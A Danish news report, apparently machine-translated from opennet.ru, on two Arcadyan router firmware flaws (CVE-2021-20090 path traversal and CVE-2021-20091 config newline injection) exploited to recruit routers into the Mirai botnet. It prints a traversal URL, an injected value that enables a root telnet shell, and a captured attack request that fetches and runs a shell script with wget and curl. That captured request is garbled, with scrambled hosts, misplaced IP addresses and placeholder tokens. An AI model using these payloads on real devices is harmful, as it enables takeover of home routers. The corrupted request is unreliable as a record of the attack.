Et massivt angreb er blevet registreret på netværket mod hjemmeroutere, hvis firmware bruger en HTTP-serverimplementering fra Arcadyan-virksomheden. For at få kontrol over enheder bruges en kombination af to sårbarheder, der tillader fjernudførelse af vilkårlig kode med root-rettigheder. Problemet påvirker en temmelig bred vifte af ADSL-routere fra Arcadyan, ASUS og Buffalo, samt enheder leveret under Beeline-mærkerne (problemet er bekræftet i Smart Box Flash), Deutsche Telekom, Orange, O2, Telus, Verizon, Vodafone og andre teleoperatører. Det bemærkes, at problemet har været til stede i Arcadyan firmware i mere end 10 år og i løbet af denne tid har formået at migrere til mindst 20 enhedsmodeller fra 17 forskellige producenter.
Den første sårbarhed, CVE-2021-20090, gør det muligt at få adgang til ethvert webgrænsefladescript uden godkendelse. Essensen af sårbarheden er, at i webgrænsefladen er nogle mapper, hvorigennem billeder, CSS-filer og JavaScript-scripts sendes, tilgængelige uden godkendelse. I dette tilfælde kontrolleres mapper, for hvilke adgang uden godkendelse er tilladt, ved hjælp af den indledende maske. Angivelse af "../"-tegn i stier for at gå til det overordnede bibliotek blokeres af firmwaren, men brug af "..%2f"-kombinationen springes over. Det er således muligt at åbne beskyttede sider, når du sender anmodninger som "http://192.168.1.1/images/..%2findex.htm".
Den anden sårbarhed, CVE-2021-20091, gør det muligt for en godkendt bruger at foretage ændringer i enhedens systemindstillinger ved at sende specielt formaterede parametre til scriptet apply_abstract.cgi, som ikke tjekker for tilstedeværelsen af et linjeskifttegn i parametrene . For eksempel, når en angriber udfører en ping-operation, kan angive værdien "192.168.1.2%0AARC_SYS_TelnetdEnable=1" i feltet med IP-adressen, der kontrolleres, og scriptet, når du opretter indstillingsfilen /tmp/etc/config/ .glbcfg, vil skrive linjen "AARC_SYS_TelnetdEnable=1" ind i den ", som aktiverer telnetd-serveren, som giver ubegrænset kommandoshell-adgang med root-rettigheder. På samme måde kan du udføre en hvilken som helst kode på systemet ved at indstille parameteren AARC_SYS. Den første sårbarhed gør det muligt at køre et problematisk script uden godkendelse ved at få adgang til det som “/images/..%2fapply_abstract.cgi”.
For at udnytte sårbarheder skal en angriber være i stand til at sende en anmodning til den netværksport, som webgrænsefladen kører på. At dømme efter dynamikken i spredningen af angrebet forlader mange operatører adgang på deres enheder fra det eksterne netværk for at forenkle diagnosticering af problemer af supporttjenesten. Hvis adgangen til grænsefladen kun er begrænset til det interne netværk, kan et angreb udføres fra et eksternt netværk ved hjælp af "DNS rebinding"-teknikken. Sårbarheder bliver allerede aktivt brugt til at forbinde routere til Mirai-botnettet: POST /images/..%2fapply_abstract.cgi HTTP/1.1 Forbindelse: luk User-Agent: Dark action=start_ping&submit_button=ping.html& action_params=blink_time%3D5&ARC_212.192.241.7.ipaddress=0. 1%0A ARC_SYS_TelnetdEnable=212.192.241.72& %212.192.241.72AARC_SYS_=cd+/tmp; wget+http://777/lolol.sh; curl+-O+http://0/lolol.sh; chmod+4+lolol.sh; sh+lolol.sh&ARC_ping_status=XNUMX&TMP_Ping_Type=XNUMX
Kilde: opennet.ru